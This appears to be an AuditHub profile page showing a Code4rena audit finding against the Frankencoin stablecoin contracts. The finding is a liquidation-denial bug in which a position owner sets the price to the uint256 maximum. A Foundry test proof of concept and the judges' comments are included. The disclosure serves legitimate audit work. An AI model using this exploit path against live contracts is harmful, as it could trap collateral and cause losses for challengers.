Back to JGcarv's contests

Frankencoin - JGcarv's results

A decentralized and fully collateralized stablecoin.

General Information

Platform: Code4rena

Start Date: 12/04/2023

Pot Size: $60,500 USDC

Total HM: 21

Participants: 199

Period: 7 days

Judge: hansfriese

Total Solo HM: 5

Id: 231

League: ETH

Frankencoin

Findings Distribution

Researcher Performance

Rank: 2/199

Findings: 1

Award: $6,748.71

🌟 Selected for report: 1

🚀 Solo Findings: 1

External Links

Code4rena Contest PageGithub Contest RepositoryGithub Findings RepositoryFrankencoin

Findings Information

🌟 Selected for report: JGcarv

Labels

bug
3 (High Risk)
primary issue
satisfactory
selected for report
sponsor confirmed
H-05

Awards

6748.7121 USDC - $6,748.71

External Links

Link to GitHub issue

Lines of code

https://github.com/code-423n4/2023-04-frankencoin/blob/main/contracts/Position.sol#L159 https://github.com/code-423n4/2023-04-frankencoin/blob/main/contracts/Position.sol#L307

Vulnerability details

Impact

The owner of a vulnerable position can deny being liquidated by setting the price to be type(uint256).max, making every call to tryAvertChallenge fail due to an overflow.

This means that if it's advantageous enough the owner can choose to keep zchf and leave the collateral stuck. This could happen in any scenario where a collateral is likely to loose it's value, for example, de-pegs, runs on the bank, etc.

Test Proof

Here's a snippet that can be pasted on GeneralTest.t.sol:

    function test_liquidationDenial() public {
        test01Equity(); // ensure there is some equity to burn
        address posAddress = initPosition();
        Position pos = Position(posAddress);

        skip(15 * 86_400 + 60);

        alice.mint(address(pos), 1001);

        vm.prank(address(alice));
        pos.adjustPrice(type(uint256).max);

        col.mint(address(bob), 1001);
        uint256 first = bob.challenge(hub, posAddress, 1001);

        bob.obtainFrankencoins(swap, 55_000 ether);

        vm.expectRevert();
        bob.bid(hub, first, 10_000 ether); 

        skip(7 * 86_400 + 60);

        vm.expectRevert();
        hub.end(first, false);
    }

#0 - c4-pre-sort

2023-04-26T11:12:39Z

0xA5DF marked the issue as primary issue

#1 - 0xA5DF

2023-04-26T11:14:51Z

I think the real issue here is that you can't end the challenge (as shown in the last line of the PoC), that will cause a loss of funds for challenger and disincentivize users from challenging the position.

#2 - luziusmeisser

2023-05-03T06:46:19Z

Ouch, this is a good one.

#3 - c4-sponsor

2023-05-03T06:46:33Z

luziusmeisser marked the issue as sponsor confirmed

#4 - hansfriese

2023-05-04T05:11:20Z

Great finding with coded POC. As the presort mentioned, the impact is the same as #670, but this has a different exploit path. Satisfactory.

#5 - c4-judge

2023-05-04T05:11:28Z

hansfriese marked the issue as satisfactory

#6 - c4-judge

2023-05-18T17:01:03Z

hansfriese marked the issue as selected for report

AuditHub

A portfolio for auditors, a security profile for protocols, a hub for web3 security.

Built bymalatrax © 2024

Auditors

Browse

Contests

Browse

Get in touch

ContactTwitter